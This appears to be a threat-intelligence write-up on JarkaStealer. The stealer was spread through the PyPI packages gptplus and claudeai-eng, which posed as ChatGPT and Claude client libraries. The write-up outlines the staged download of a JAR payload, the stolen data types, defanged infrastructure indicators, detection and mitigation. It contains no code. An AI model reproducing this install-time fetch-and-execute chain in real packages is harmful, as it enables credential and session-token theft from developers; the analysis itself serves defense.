Full Report
Cybersecurity researchers have discovered two malicious packages uploaded to the Python Package Index (PyPI) repository that impersonated popular artificial intelligence (AI) models like OpenAI ChatGPT and Anthropic Claude to deliver an information stealer called JarkaStealer. The packages, named gptplus and claudeai-eng, were uploaded by a user named "Xeroline" in November 2023, attracting
Analysis Summary
# Tool/Technique: JarkaStealer (via PyPI Impersonation)
## Overview
JarkaStealer is an information-stealing malware discovered being distributed through malicious Python packages on the Python Package Index (PyPI). These packages, named `gptplus` and `claudeai-eng`, impersonated legitimate AI model APIs (ChatGPT and Claude) to trick developers into installing them, thus initiating a supply chain attack.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Primarily Windows hosts running the Python interpreter (due to the use of Python libraries and Java execution).
- Capabilities: Steals sensitive information including browser data, system data, screenshots, and session tokens from applications like Telegram, Discord, and Steam. It operates via a multi-stage download and execution process.
- First Seen: November 2023 (packages uploaded).
## MITRE ATT&CK Mapping
Since this involves package abuse and remote execution:
- **TA0001 - Initial Access**
- **T1190 - Exploit Public-Facing Application** (Distribution via a public repository like PyPI)
- **TA0002 - Execution**
- **T1059.006 - Command and Scripting Interpreter: Python** (Malicious code embedded in `__init__.py`)
- **TA0010 - Exfiltration**
- **T1041 - Exfiltration Over C2 Channel** (Transmitting collected data to attacker servers)
## Functionality
### Core Capabilities
- **Supply Chain Compromise:** Leveraging the trust in open-source repositories (PyPI).
- **Staging:** The malicious Python packages (`__init__.py`) execute code to fetch subsequent stages.
- **Dependency Retrieval:** Downloads a file named `JavaUpdater.jar` from a GitHub repository (`github[.]com/imystorage/storage`).
- **Environment Setup:** Downloads and installs the Java Runtime Environment (JRE) from a Dropbox URL if Java is missing, ensuring necessary preconditions for the malware execution.
- **Execution:** Executes the downloaded `JavaUpdater.jar`, which is the JarkaStealer payload.
### Advanced Features
- **Information Theft:** Specialized in credential and session token harvesting from common persistence locations (browsers, messaging/gaming apps).
- **Self-Cleaning:** Deletes collected data from the victim's machine after successful exfiltration.
- **Malware-as-a-Service (MaaS):** JarkaStealer was reportedly offered for sale on Telegram for $20-$50.
## Indicators of Compromise
- File Hashes: (Not explicitly provided in the text)
- File Names: `JavaUpdater.jar`, `gptplus` (package name), `claudeai-eng` (package name)
- Registry Keys: (Not provided)
- Network Indicators: C2 infrastructure hosted on `github[.]com/imystorage/storage` (for JAR download) and a source for JRE hosted on `dropbox[.]com`.
- Behavioral Indicators: Execution of Python code upon package installation that attempts to download and run a Java `.jar` file, especially if Java is not pre-installed.
## Associated Threat Actors
- The packages were published by the user "**Xeroline**" on PyPI.
- The malware itself (JarkaStealer) is associated with a MaaS operation communicated via a Telegram channel.
## Detection Methods
- **Signature-based detection:** Scanning for known hashes of `JavaUpdater.jar`.
- **Behavioral detection:** Monitoring Python package installation processes (`pip install`) that trigger subsequent downloads (e.g., from GitHub or Dropbox) or launch Java processes unexpectedly. Suspicious execution of `__init__.py` content containing Base64 decoding.
- **YARA rules:** (Not provided)
## Mitigation Strategies
- **Prevention measures:** Strict review and vetting of external Python libraries before installation, especially those imitating popular software.
- **Hardening recommendations:** Implement network filtering to restrict outbound connections to GitHub or Dropbox URLs initiated by common installation processes. Ensure robust Endpoint Detection and Response (EDR) capabilities to monitor for arbitrary file downloads and Java execution stemming from software installation routines. Use package checksum verification where possible.
## Related Tools/Techniques
- **JarkaStealer:** The ultimate payload.
- **PyPI Tampering:** The overall distribution technique, similar to dependency confusion or typo-squatting campaigns, but using impersonation of AI tooling names.
- **Leaked Source Code:** The source code for JarkaStealer was reportedly leaked on GitHub by user `Loremas1er`.